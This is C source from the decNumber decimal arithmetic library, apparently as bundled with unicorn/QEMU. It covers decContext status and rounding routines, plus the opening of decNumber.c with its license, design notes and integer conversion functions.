* decContextDefault(decContext *context, Int kind) { /* set defaults... */ context->digits=9; /* 9 digits */ context->emax=DEC_MAX_EMAX; /* 9-digit exponents */ context->emin=DEC_MIN_EMIN; /* .. balanced */ context->round=DEC_ROUND_HALF_UP; /* 0.5 rises */ context->traps=DEC_Errors; /* all but informational */ context->status=0; /* cleared */ context->clamp=0; /* no clamping */ #if DECSUBSET context->extended=0; /* cleared */ #endif switch (kind) { case DEC_INIT_BASE: /* [use defaults] */ break; case DEC_INIT_DECIMAL32: context->digits=7; /* digits */ context->emax=96; /* Emax */ context->emin=-95; /* Emin */ context->round=DEC_ROUND_HALF_EVEN; /* 0.5 to nearest even */ context->traps=0; /* no traps set */ context->clamp=1; /* clamp exponents */ #if DECSUBSET context->extended=1; /* set */ #endif break; case DEC_INIT_DECIMAL64: context->digits=16; /* digits */ context->emax=384; /* Emax */ context->emin=-383; /* Emin */ context->round=DEC_ROUND_HALF_EVEN; /* 0.5 to nearest even */ context->traps=0; /* no traps set */ context->clamp=1; /* clamp exponents */ #if DECSUBSET context->extended=1; /* set */ #endif break; case DEC_INIT_DECIMAL128: context->digits=34; /* digits */ context->emax=6144; /* Emax */ context->emin=-6143; /* Emin */ context->round=DEC_ROUND_HALF_EVEN; /* 0.5 to nearest even */ context->traps=0; /* no traps set */ context->clamp=1; /* clamp exponents */ #if DECSUBSET context->extended=1; /* set */ #endif break; default: /* invalid Kind */ /* use defaults, and .. */ decContextSetStatus(context, DEC_Invalid_operation); /* trap */ } #if DECCHECK if (LITEND!=DECLITEND) { const char *adj; if (LITEND) adj="little"; else adj="big"; printf("Warning: DECLITEND is set to %d, but this computer appears to be %s-endian\n", DECLITEND, adj); } #endif return context;} /* decContextDefault */ /* ------------------------------------------------------------------ */ /* decContextGetRounding -- return current rounding mode */ /* */ /* context is the context structure to be queried */ /* returns the rounding mode */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ enum rounding decContextGetRounding(decContext *context) { return context->round; } /* decContextGetRounding */ /* ------------------------------------------------------------------ */ /* decContextGetStatus -- return current status */ /* */ /* context is the context structure to be queried */ /* returns status */ /* */ /* No error is possible. 
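*/
/* ------------------------------------------------------------------ */
/* Added usage sketch -- not part of the original module: initialize  */
/* a context for decimal64 arithmetic, then tighten the rounding mode */
/* with the setter defined later in this file.                        */
/* ------------------------------------------------------------------ */
static void decContextDefaultDemo(void) {
  decContext ctx;                               /* working context */
  decContextDefault(&ctx, DEC_INIT_DECIMAL64);  /* 16 digits, half-even */
  decContextSetRounding(&ctx, DEC_ROUND_DOWN);  /* truncate instead */
  } /* decContextDefaultDemo */
/*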
*/ /* ------------------------------------------------------------------ */ uInt decContextGetStatus(decContext *context) { return context->status; } /* decContextGetStatus */ /* ------------------------------------------------------------------ */ /* decContextRestoreStatus -- restore bits in current status */ /* */ /* context is the context structure to be updated */ /* newstatus is the source for the bits to be restored */ /* mask indicates the bits to be restored (the status bit that */ /* corresponds to each 1 bit in the mask is set to the value of */ /* the corresponding bit in newstatus) */ /* returns context */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext *decContextRestoreStatus(decContext *context, uInt newstatus, uInt mask) { context->status&=~mask; /* clear the selected bits */ context->status|=(mask&newstatus); /* or in the new bits */ return context; } /* decContextRestoreStatus */ /* ------------------------------------------------------------------ */ /* decContextSaveStatus -- save bits in current status */ /* */ /* context is the context structure to be queried */ /* mask indicates the bits to be saved (the status bits that */ /* correspond to each 1 bit in the mask are saved) */ /* returns the AND of the mask and the current status */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextSaveStatus(decContext *context, uInt mask) { return context->status&mask; } /* decContextSaveStatus */ /* ------------------------------------------------------------------ */ /* decContextSetRounding -- set current rounding mode */ /* */ /* context is the context structure to be updated */ /* newround is the value which will replace the current mode */ /* returns context */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext *decContextSetRounding(decContext *context, enum rounding newround) { context->round=newround; return context; } /* decContextSetRounding */ /* ------------------------------------------------------------------ */ /* decContextSetStatus -- set status and raise trap if appropriate */ /* */ /* context is the context structure to be updated */ /* status is the DEC_ exception code */ /* returns the context structure */ /* */ /* Control may never return from this routine, if there is a signal */ /* handler and it takes a long jump. */ /* ------------------------------------------------------------------ */ decContext * decContextSetStatus(decContext *context, uInt status) { context->status|=status; if (status & context->traps) raise(SIGFPE); return context;} /* decContextSetStatus */ /* ------------------------------------------------------------------ */ /* decContextSetStatusFromString -- set status from a string + trap */ /* */ /* context is the context structure to be updated */ /* string is a string exactly equal to one that might be returned */ /* by decContextStatusToString */ /* */ /* The status bit corresponding to the string is set, and a trap */ /* is raised if appropriate. */ /* */ /* returns the context structure, unless the string is equal to */ /* DEC_Condition_MU or is not recognized. In these cases NULL is */ /* returned. 
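*/
/* ------------------------------------------------------------------ */
/* Added sketch -- not part of the original module: a save/clear/     */
/* restore round trip for a single status bit, composed from the      */
/* routines defined above.                                            */
/* ------------------------------------------------------------------ */
static void decContextStatusRoundTripDemo(decContext *context) {
  uInt saved=decContextSaveStatus(context, DEC_Inexact);  /* snapshot */
  decContextClearStatus(context, DEC_Inexact);            /* clear bit */
  decContextRestoreStatus(context, saved, DEC_Inexact);   /* put back */
  } /* decContextStatusRoundTripDemo */
/*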
*/ /* ------------------------------------------------------------------ */ decContext * decContextSetStatusFromString(decContext *context, const char *string) { if (strcmp(string, DEC_Condition_CS)==0) return decContextSetStatus(context, DEC_Conversion_syntax); if (strcmp(string, DEC_Condition_DZ)==0) return decContextSetStatus(context, DEC_Division_by_zero); if (strcmp(string, DEC_Condition_DI)==0) return decContextSetStatus(context, DEC_Division_impossible); if (strcmp(string, DEC_Condition_DU)==0) return decContextSetStatus(context, DEC_Division_undefined); if (strcmp(string, DEC_Condition_IE)==0) return decContextSetStatus(context, DEC_Inexact); if (strcmp(string, DEC_Condition_IS)==0) return decContextSetStatus(context, DEC_Insufficient_storage); if (strcmp(string, DEC_Condition_IC)==0) return decContextSetStatus(context, DEC_Invalid_context); if (strcmp(string, DEC_Condition_IO)==0) return decContextSetStatus(context, DEC_Invalid_operation); #if DECSUBSET if (strcmp(string, DEC_Condition_LD)==0) return decContextSetStatus(context, DEC_Lost_digits); #endif if (strcmp(string, DEC_Condition_OV)==0) return decContextSetStatus(context, DEC_Overflow); if (strcmp(string, DEC_Condition_PA)==0) return decContextSetStatus(context, DEC_Clamped); if (strcmp(string, DEC_Condition_RO)==0) return decContextSetStatus(context, DEC_Rounded); if (strcmp(string, DEC_Condition_SU)==0) return decContextSetStatus(context, DEC_Subnormal); if (strcmp(string, DEC_Condition_UN)==0) return decContextSetStatus(context, DEC_Underflow); if (strcmp(string, DEC_Condition_ZE)==0) return context; return NULL; /* Multiple status, or unknown */ } /* decContextSetStatusFromString */ /* ------------------------------------------------------------------ */ /* decContextSetStatusFromStringQuiet -- set status from a string */ /* */ /* context is the context structure to be updated */ /* string is a string exactly equal to one that might be returned */ /* by decContextStatusToString */ /* */ /* The status bit corresponding to the string is set; no trap is */ /* raised. */ /* */ /* returns the context structure, unless the string is equal to */ /* DEC_Condition_MU or is not recognized. In these cases NULL is */ /* returned. 
*/ /* ------------------------------------------------------------------ */ decContext * decContextSetStatusFromStringQuiet(decContext *context, const char *string) { if (strcmp(string, DEC_Condition_CS)==0) return decContextSetStatusQuiet(context, DEC_Conversion_syntax); if (strcmp(string, DEC_Condition_DZ)==0) return decContextSetStatusQuiet(context, DEC_Division_by_zero); if (strcmp(string, DEC_Condition_DI)==0) return decContextSetStatusQuiet(context, DEC_Division_impossible); if (strcmp(string, DEC_Condition_DU)==0) return decContextSetStatusQuiet(context, DEC_Division_undefined); if (strcmp(string, DEC_Condition_IE)==0) return decContextSetStatusQuiet(context, DEC_Inexact); if (strcmp(string, DEC_Condition_IS)==0) return decContextSetStatusQuiet(context, DEC_Insufficient_storage); if (strcmp(string, DEC_Condition_IC)==0) return decContextSetStatusQuiet(context, DEC_Invalid_context); if (strcmp(string, DEC_Condition_IO)==0) return decContextSetStatusQuiet(context, DEC_Invalid_operation); #if DECSUBSET if (strcmp(string, DEC_Condition_LD)==0) return decContextSetStatusQuiet(context, DEC_Lost_digits); #endif if (strcmp(string, DEC_Condition_OV)==0) return decContextSetStatusQuiet(context, DEC_Overflow); if (strcmp(string, DEC_Condition_PA)==0) return decContextSetStatusQuiet(context, DEC_Clamped); if (strcmp(string, DEC_Condition_RO)==0) return decContextSetStatusQuiet(context, DEC_Rounded); if (strcmp(string, DEC_Condition_SU)==0) return decContextSetStatusQuiet(context, DEC_Subnormal); if (strcmp(string, DEC_Condition_UN)==0) return decContextSetStatusQuiet(context, DEC_Underflow); if (strcmp(string, DEC_Condition_ZE)==0) return context; return NULL; /* Multiple status, or unknown */ } /* decContextSetStatusFromStringQuiet */ /* ------------------------------------------------------------------ */ /* decContextSetStatusQuiet -- set status without trap */ /* */ /* context is the context structure to be updated */ /* status is the DEC_ exception code */ /* returns the context structure */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext * decContextSetStatusQuiet(decContext *context, uInt status) { context->status|=status; return context;} /* decContextSetStatusQuiet */ /* ------------------------------------------------------------------ */ /* decContextStatusToString -- convert status flags to a string */ /* */ /* context is a context with valid status field */ /* */ /* returns a constant string describing the condition. If multiple */ /* (or no) flags are set, a generic constant message is returned. 
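*/
/* ------------------------------------------------------------------ */
/* Added sketch -- not part of the original module: raise a condition */
/* quietly, then map the (single-bit) status to its constant string.  */
/* ------------------------------------------------------------------ */
static void decContextStatusStringDemo(decContext *context) {
  decContextZeroStatus(context);                           /* start clean */
  decContextSetStatusQuiet(context, DEC_Division_by_zero); /* set, no trap */
  /* decContextStatusToString now returns DEC_Condition_DZ */
  printf("%s\n", decContextStatusToString(context));
  } /* decContextStatusStringDemo */
/*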
*/ /* ------------------------------------------------------------------ */ const char *decContextStatusToString(const decContext *context) { Int status=context->status; /* test the five IEEE first, as some of the others are ambiguous when */ /* DECEXTFLAG=0 */ if (status==DEC_Invalid_operation ) return DEC_Condition_IO; if (status==DEC_Division_by_zero ) return DEC_Condition_DZ; if (status==DEC_Overflow ) return DEC_Condition_OV; if (status==DEC_Underflow ) return DEC_Condition_UN; if (status==DEC_Inexact ) return DEC_Condition_IE; if (status==DEC_Division_impossible ) return DEC_Condition_DI; if (status==DEC_Division_undefined ) return DEC_Condition_DU; if (status==DEC_Rounded ) return DEC_Condition_RO; if (status==DEC_Clamped ) return DEC_Condition_PA; if (status==DEC_Subnormal ) return DEC_Condition_SU; if (status==DEC_Conversion_syntax ) return DEC_Condition_CS; if (status==DEC_Insufficient_storage ) return DEC_Condition_IS; if (status==DEC_Invalid_context ) return DEC_Condition_IC; #if DECSUBSET if (status==DEC_Lost_digits ) return DEC_Condition_LD; #endif if (status==0 ) return DEC_Condition_ZE; return DEC_Condition_MU; /* Multiple errors */ } /* decContextStatusToString */ /* ------------------------------------------------------------------ */ /* decContextTestSavedStatus -- test bits in saved status */ /* */ /* oldstatus is the status word to be tested */ /* mask indicates the bits to be tested (the oldstatus bits that */ /* correspond to each 1 bit in the mask are tested) */ /* returns 1 if any of the tested bits are 1, or 0 otherwise */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextTestSavedStatus(uInt oldstatus, uInt mask) { return (oldstatus&mask)!=0; } /* decContextTestSavedStatus */ /* ------------------------------------------------------------------ */ /* decContextTestStatus -- test bits in current status */ /* */ /* context is the context structure to be updated */ /* mask indicates the bits to be tested (the status bits that */ /* correspond to each 1 bit in the mask are tested) */ /* returns 1 if any of the tested bits are 1, or 0 otherwise */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextTestStatus(decContext *context, uInt mask) { return (context->status&mask)!=0; } /* decContextTestStatus */ /* ------------------------------------------------------------------ */ /* decContextZeroStatus -- clear all status bits */ /* */ /* context is the context structure to be updated */ /* returns context */ /* */ /* No error is possible. 
*/ /* ------------------------------------------------------------------ */ decContext *decContextZeroStatus(decContext *context) { context->status=0; return context; } /* decContextZeroStatus */

unicorn-2.1.1/qemu/libdecnumber/decNumber.c

/* Decimal number arithmetic module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Number arithmetic module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for General Decimal Arithmetic */ /* as defined in the specification which may be found on the */ /* http://www2.hursley.ibm.com/decimal web pages. It implements both */ /* the full ('extended') arithmetic and the simpler ('subset') */ /* arithmetic. */ /* */ /* Usage notes: */ /* */ /* 1. This code is ANSI C89 except: */ /* */ /* If DECDPUN>4 or DECUSE64=1, the C99 64-bit int64_t and */ /* uint64_t types may be used. To avoid these, set DECUSE64=0 */ /* and DECDPUN<=4 (see documentation). */ /* */ /* 2. The decNumber format which this library uses is optimized for */ /* efficient processing of relatively short numbers; in particular */ /* it allows the use of fixed sized structures and minimizes copy */ /* and move operations. It does, however, support arbitrary */ /* precision (up to 999,999,999 digits) and arbitrary exponent */ /* range (Emax in the range 0 through 999,999,999 and Emin in the */ /* range -999,999,999 through 0). 
Mathematical functions (for */ /* example decNumberExp) as identified below are restricted more */ /* tightly: digits, emax, and -emin in the context must be <= */ /* DEC_MAX_MATH (999999), and their operand(s) must be within */ /* these bounds. */ /* */ /* 3. Logical functions are further restricted; their operands must */ /* be finite, positive, have an exponent of zero, and all digits */ /* must be either 0 or 1. The result will only contain digits */ /* which are 0 or 1 (and will have exponent=0 and a sign of 0). */ /* */ /* 4. Operands to operator functions are never modified unless they */ /* are also specified to be the result number (which is always */ /* permitted). Other than that case, operands must not overlap. */ /* */ /* 5. Error handling: the type of the error is ORed into the status */ /* flags in the current context (decContext structure). The */ /* SIGFPE signal is then raised if the corresponding trap-enabler */ /* flag in the decContext is set (is 1). */ /* */ /* It is the responsibility of the caller to clear the status */ /* flags as required. */ /* */ /* The result of any routine which returns a number will always */ /* be a valid number (which may be a special value, such as an */ /* Infinity or NaN). */ /* */ /* 6. The decNumber format is not an exchangeable concrete */ /* representation as it comprises fields which may be machine- */ /* dependent (packed or unpacked, or special length, for example). */ /* Canonical conversions to and from strings are provided; other */ /* conversions are available in separate modules. */ /* */ /* 7. Normally, input operands are assumed to be valid. Set DECCHECK */ /* to 1 for extended operand checking (including NULL operands). */ /* Results are undefined if a badly-formed structure (or a NULL */ /* pointer to a structure) is provided, though with DECCHECK */ /* enabled the operator routines are protected against exceptions. */ /* (Except if the result pointer is NULL, which is unrecoverable.) */ /* */ /* However, the routines will never cause exceptions if they are */ /* given well-formed operands, even if the value of the operands */ /* is inappropriate for the operation and DECCHECK is not set. */ /* (Except for SIGFPE, as and where documented.) */ /* */ /* 8. Subset arithmetic is available only if DECSUBSET is set to 1. */ /* ------------------------------------------------------------------ */ /* Implementation notes for maintenance of this module: */ /* */ /* 1. Storage leak protection: Routines which use malloc are not */ /* permitted to use return for fastpath or error exits (i.e., */ /* they follow strict structured programming conventions). */ /* Instead they have a do{}while(0); construct surrounding the */ /* code which is protected -- break may be used to exit this. */ /* Other routines can safely use the return statement inline. */ /* */ /* Storage leak accounting can be enabled using DECALLOC. */ /* */ /* 2. All loops use the for(;;) construct. Any do construct does */ /* not loop; it is for allocation protection as just described. */ /* */ /* 3. Setting status in the context must always be the very last */ /* action in a routine, as non-0 status may raise a trap and hence */ /* the call to set status may not return (if the handler uses long */ /* jump). Therefore all cleanup must be done first. In general, */ /* to achieve this status is accumulated and is only applied just */ /* before return by calling decContextSetStatus (via decStatus). 
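
   Concretely, the operator routines in this module all follow the
   shape below (a sketch only; decAddOp is one of the local
   routines declared later in this file):

     uInt status=0;                               accumulator
     ...
     decAddOp(res, lhs, rhs, set, 0, &status);
     ...free any allocated storage here...
     if (status!=0) decStatus(res, status, set);  [may not return]
     return res;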
*/ /* */ /* Routines which allocate storage cannot, in general, use the */ /* 'top level' routines which could cause a non-returning */ /* transfer of control. The decXxxxOp routines are safe (do not */ /* call decStatus even if traps are set in the context) and should */ /* be used instead (they are also a little faster). */ /* */ /* 4. Exponent checking is minimized by allowing the exponent to */ /* grow outside its limits during calculations, provided that */ /* the decFinalize function is called later. Multiplication and */ /* division, and intermediate calculations in exponentiation, */ /* require more careful checks because of the risk of 31-bit */ /* overflow (the most negative valid exponent is -1999999997, for */ /* a 999999999-digit number with adjusted exponent of -999999999). */ /* */ /* 5. Rounding is deferred until finalization of results, with any */ /* 'off to the right' data being represented as a single digit */ /* residue (in the range -1 through 9). This avoids any double- */ /* rounding when more than one shortening takes place (for */ /* example, when a result is subnormal). */ /* */ /* 6. The digits count is allowed to rise to a multiple of DECDPUN */ /* during many operations, so whole Units are handled and exact */ /* accounting of digits is not needed. The correct digits value */ /* is found by decGetDigits, which accounts for leading zeros. */ /* This must be called before any rounding if the number of digits */ /* is not known exactly. */ /* */ /* 7. The multiply-by-reciprocal 'trick' is used for partitioning */ /* numbers up to four digits, using appropriate constants. This */ /* is not useful for longer numbers because overflow of 32 bits */ /* would lead to 4 multiplies, which is almost as expensive as */ /* a divide (unless a floating-point or 64-bit multiply is */ /* assumed to be available). */ /* */ /* 8. Unusual abbreviations that may be used in the commentary: */ /* lhs -- left hand side (operand, of an operation) */ /* lsd -- least significant digit (of coefficient) */ /* lsu -- least significant Unit (of coefficient) */ /* msd -- most significant digit (of coefficient) */ /* msi -- most significant item (in an array) */ /* msu -- most significant Unit (of coefficient) */ /* rhs -- right hand side (operand, of an operation) */ /* +ve -- positive */ /* -ve -- negative */ /* ** -- raise to the power */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" /* Constants */ /* Public lookup table used by the D2U macro */ const uByte d2utable[DECMAXD2U+1]=D2UTABLE; #define DECVERB 1 /* set to 1 for verbose DECCHECK */ #define powers DECPOWERS /* old internal name */ /* Local constants */ #define DIVIDE 0x80 /* Divide operators */ #define REMAINDER 0x40 /* .. */ #define DIVIDEINT 0x20 /* .. */ #define REMNEAR 0x10 /* .. */ #define COMPARE 0x01 /* Compare operators */ #define COMPMAX 0x02 /* .. */ #define COMPMIN 0x03 /* .. */ #define COMPTOTAL 0x04 /* .. */ #define COMPNAN 0x05 /* .. [NaN processing] */ #define COMPSIG 0x06 /* .. [signaling COMPARE] */ #define COMPMAXMAG 0x07 /* .. */ #define COMPMINMAG 0x08 /* .. 
*/ #define DEC_sNaN 0x40000000 /* local status: sNaN signal */ #define BADINT (Int)0x80000000 /* most-negative Int; error indicator */ /* Next two indicate an integer >= 10**6, and its parity (bottom bit) */ #define BIGEVEN (Int)0x80000002 #define BIGODD (Int)0x80000003 static Unit uarrone[1]={1}; /* Unit array of 1, used for incrementing */ /* Granularity-dependent code */ #if DECDPUN<=4 #define eInt Int /* extended integer */ #define ueInt uInt /* unsigned extended integer */ /* Constant multipliers for divide-by-power-of five using reciprocal */ /* multiply, after removing powers of 2 by shifting, and final shift */ /* of 17 [we only need up to **4] */ static const uInt multies[]={131073, 26215, 5243, 1049, 210}; /* QUOT10 -- macro to return the quotient of unit u divided by 10**n */ #define QUOT10(u, n) ((((uInt)(u)>>(n))*multies[n])>>17) #else /* For DECDPUN>4 non-ANSI-89 64-bit types are needed. */ #if !DECUSE64 #error decNumber.c: DECUSE64 must be 1 when DECDPUN>4 #endif #define eInt Long /* extended integer */ #define ueInt uLong /* unsigned extended integer */ #endif /* Local routines */ static decNumber * decAddOp(decNumber *, const decNumber *, const decNumber *, decContext *, uByte, uInt *); static Flag decBiStr(const char *, const char *, const char *); static uInt decCheckMath(const decNumber *, decContext *, uInt *); static void decApplyRound(decNumber *, decContext *, Int, uInt *); static Int decCompare(const decNumber *lhs, const decNumber *rhs, Flag); static decNumber * decCompareOp(decNumber *, const decNumber *, const decNumber *, decContext *, Flag, uInt *); static void decCopyFit(decNumber *, const decNumber *, decContext *, Int *, uInt *); static decNumber * decDecap(decNumber *, Int); static decNumber * decDivideOp(decNumber *, const decNumber *, const decNumber *, decContext *, Flag, uInt *); static decNumber * decExpOp(decNumber *, const decNumber *, decContext *, uInt *); static void decFinalize(decNumber *, decContext *, Int *, uInt *); static Int decGetDigits(Unit *, Int); static Int decGetInt(const decNumber *); static decNumber * decLnOp(decNumber *, const decNumber *, decContext *, uInt *); static decNumber * decMultiplyOp(decNumber *, const decNumber *, const decNumber *, decContext *, uInt *); static decNumber * decNaNs(decNumber *, const decNumber *, const decNumber *, decContext *, uInt *); static decNumber * decQuantizeOp(decNumber *, const decNumber *, const decNumber *, decContext *, Flag, uInt *); static void decReverse(Unit *, Unit *); static void decSetCoeff(decNumber *, decContext *, const Unit *, Int, Int *, uInt *); static void decSetMaxValue(decNumber *, decContext *); static void decSetOverflow(decNumber *, decContext *, uInt *); static void decSetSubnormal(decNumber *, decContext *, Int *, uInt *); static Int decShiftToLeast(Unit *, Int, Int); static Int decShiftToMost(Unit *, Int, Int); static void decStatus(decNumber *, uInt, decContext *); static void decToString(const decNumber *, char[], Flag); static decNumber * decTrim(decNumber *, decContext *, Flag, Int *); static Int decUnitAddSub(const Unit *, Int, const Unit *, Int, Int, Unit *, Int); static Int decUnitCompare(const Unit *, Int, const Unit *, Int, Int); #if !DECSUBSET /* decFinish == decFinalize when no subset arithmetic needed */ #define decFinish(a,b,c,d) decFinalize(a,b,c,d) #else static void decFinish(decNumber *, decContext *, Int *, uInt *); static decNumber * decRoundOperand(const decNumber *, decContext *, uInt *); #endif /* Local macros */ /* masked special-values bits */ 
#define SPECIALARG (rhs->bits & DECSPECIAL) #define SPECIALARGS ((lhs->bits | rhs->bits) & DECSPECIAL) /* Diagnostic macros, etc. */ #if DECALLOC /* Handle malloc/free accounting. If enabled, our accountable routines */ /* are used; otherwise the code just goes straight to the system malloc */ /* and free routines. */ #define malloc(a) decMalloc(a) #define free(a) decFree(a) #define DECFENCE 0x5a /* corruption detector */ /* 'Our' malloc and free: */ static void *decMalloc(size_t); static void decFree(void *); uInt decAllocBytes=0; /* count of bytes allocated */ /* Note that DECALLOC code only checks for storage buffer overflow. */ /* To check for memory leaks, the decAllocBytes variable must be */ /* checked to be 0 at appropriate times (e.g., after the test */ /* harness completes a set of tests). This checking may be unreliable */ /* if the testing is done in a multi-thread environment. */ #endif #if DECCHECK /* Optional checking routines. Enabling these means that decNumber */ /* and decContext operands to operator routines are checked for */ /* correctness. This roughly doubles the execution time of the */ /* fastest routines (and adds 600+ bytes), so should not normally be */ /* used in 'production'. */ /* decCheckInexact is used to check that inexact results have a full */ /* complement of digits (where appropriate -- this is not the case */ /* for Quantize, for example) */ #define DECUNRESU ((decNumber *)(void *)0xffffffff) #define DECUNUSED ((const decNumber *)(void *)0xffffffff) #define DECUNCONT ((decContext *)(void *)(0xffffffff)) static Flag decCheckOperands(decNumber *, const decNumber *, const decNumber *, decContext *); static Flag decCheckNumber(const decNumber *); static void decCheckInexact(const decNumber *, decContext *); #endif #if DECTRACE || DECCHECK /* Optional trace/debugging routines (may or may not be used) */ void decNumberShow(const decNumber *); /* displays the components of a number */ static void decDumpAr(char, const Unit *, Int); #endif /* ================================================================== */ /* Conversions */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* from-int32 -- conversion from Int or uInt */ /* */ /* dn is the decNumber to receive the integer */ /* in or uin is the integer to be converted */ /* returns dn */ /* */ /* No error is possible. 
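
   For example (an illustrative sketch, not part of the library;
   it assumes DECNUMDIGITS was defined as at least 10 before
   decNumber.h was included, so dn can hold any 32-bit integer):

     decNumber dn;
     char buf[DECNUMDIGITS+14];       sized per decNumberToString
     decNumberFromInt32(&dn, -2147483647-1);
     decNumberToString(&dn, buf);     buf is now "-2147483648"

   The most-negative Int (BADINT) is the special case visible in
   the code below.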
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberFromInt32(decNumber *dn, Int in) { uInt unsig; if (in>=0) unsig=in; else { /* negative (possibly BADINT) */ if (in==BADINT) unsig=(uInt)1073741824*2; /* special case */ else unsig=-in; /* invert */ } /* in is now positive */ decNumberFromUInt32(dn, unsig); if (in<0) dn->bits=DECNEG; /* sign needed */ return dn; } /* decNumberFromInt32 */ decNumber * decNumberFromUInt32(decNumber *dn, uInt uin) { Unit *up; /* work pointer */ decNumberZero(dn); /* clean */ if (uin==0) return dn; /* [or decGetDigits bad call] */ for (up=dn->lsu; uin>0; up++) { *up=(Unit)(uin%(DECDPUNMAX+1)); uin=uin/(DECDPUNMAX+1); } dn->digits=decGetDigits(dn->lsu, up-dn->lsu); return dn; } /* decNumberFromUInt32 */ /* ------------------------------------------------------------------ */ /* to-int32 -- conversion to Int or uInt */ /* */ /* dn is the decNumber to convert */ /* set is the context for reporting errors */ /* returns the converted decNumber, or 0 if Invalid is set */ /* */ /* Invalid is set if the decNumber does not have exponent==0 or if */ /* it is a NaN, Infinite, or out-of-range. */ /* ------------------------------------------------------------------ */ Int decNumberToInt32(const decNumber *dn, decContext *set) { #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif /* special or too many digits, or bad exponent */ if (dn->bits&DECSPECIAL || dn->digits>10 || dn->exponent!=0) ; /* bad */ else { /* is a finite integer with 10 or fewer digits */ Int d; /* work */ const Unit *up; /* .. */ uInt hi=0, lo; /* .. */ up=dn->lsu; /* -> lsu */ lo=*up; /* get 1 to 9 digits */ #if DECDPUN>1 /* split to higher */ hi=lo/10; lo=lo%10; #endif up++; /* collect remaining Units, if any, into hi */ for (d=DECDPUN; d<dn->digits; up++, d+=DECDPUN) hi+=*up*powers[d-1]; /* now low has the lsd, hi the remainder */ if (hi>214748364 || (hi==214748364 && lo>7)) { /* out of range? */ /* most-negative is a reprieve */ if (dn->bits&DECNEG && hi==214748364 && lo==8) return 0x80000000; /* bad -- drop through */ } else { /* in-range always */ Int i=X10(hi)+lo; if (dn->bits&DECNEG) return -i; return i; } } /* integer */ decContextSetStatus(set, DEC_Invalid_operation); /* [may not return] */ return 0; } /* decNumberToInt32 */ uInt decNumberToUInt32(const decNumber *dn, decContext *set) { #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif /* special or too many digits, or bad exponent, or negative (<0) */ if (dn->bits&DECSPECIAL || dn->digits>10 || dn->exponent!=0 || (dn->bits&DECNEG && !ISZERO(dn))); /* bad */ else { /* is a finite integer with 10 or fewer digits */ Int d; /* work */ const Unit *up; /* .. */ uInt hi=0, lo; /* .. 
*/ up=dn->lsu; /* -> lsu */ lo=*up; /* get 1 to 9 digits */ #if DECDPUN>1 /* split to higher */ hi=lo/10; lo=lo%10; #endif up++; /* collect remaining Units, if any, into hi */ for (d=DECDPUN; d<dn->digits; up++, d+=DECDPUN) hi+=*up*powers[d-1]; /* now low has the lsd, hi the remainder */ if (hi>429496729 || (hi==429496729 && lo>5)) ; /* no reprieve possible */ else return X10(hi)+lo; } /* integer */ decContextSetStatus(set, DEC_Invalid_operation); /* [may not return] */ return 0; } /* decNumberToUInt32 */ decNumber *decNumberFromInt64(decNumber *dn, int64_t in) { uint64_t unsig = in; if (in < 0) { #ifdef _MSC_VER unsig = 0 - unsig; #else unsig = -unsig; #endif } decNumberFromUInt64(dn, unsig); if (in < 0) { dn->bits = DECNEG; /* sign needed */ } return dn; } /* decNumberFromInt64 */ decNumber *decNumberFromUInt64(decNumber *dn, uint64_t uin) { Unit *up; /* work pointer */ decNumberZero(dn); /* clean */ if (uin == 0) { return dn; /* [or decGetDigits bad call] */ } for (up = dn->lsu; uin > 0; up++) { *up = (Unit)(uin % (DECDPUNMAX + 1)); uin = uin / (DECDPUNMAX + 1); } dn->digits = decGetDigits(dn->lsu, up-dn->lsu); return dn; } /* decNumberFromUInt64 */ /* ------------------------------------------------------------------ */ /* to-int64 -- conversion to int64 */ /* */ /* dn is the decNumber to convert. dn is assumed to have been */ /* rounded to a floating point integer value. */ /* set is the context for reporting errors */ /* returns the converted decNumber, or 0 if Invalid is set */ /* */ /* Invalid is set if the decNumber is a NaN, Infinite or is out of */ /* range for a signed 64 bit integer. */ /* ------------------------------------------------------------------ */ int64_t decNumberIntegralToInt64(const decNumber *dn, decContext *set) { if (decNumberIsSpecial(dn) || (dn->exponent < 0) || (dn->digits + dn->exponent > 19)) { goto Invalid; } else { int64_t d; /* work */ const Unit *up; /* .. */ uint64_t hi = 0; up = dn->lsu; /* -> lsu */ for (d = 1; d <= dn->digits; up++, d += DECDPUN) { uint64_t prev = hi; hi += *up * powers[d-1]; if ((hi < prev) || (hi > INT64_MAX)) { goto Invalid; } } uint64_t prev = hi; hi *= (uint64_t)powers[dn->exponent]; if ((hi < prev) || (hi > INT64_MAX)) { goto Invalid; } return (decNumberIsNegative(dn)) ? -((int64_t)hi) : (int64_t)hi; } Invalid: decContextSetStatus(set, DEC_Invalid_operation); return 0; } /* decNumberIntegralToInt64 */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decNumberToString(dn, string); */ 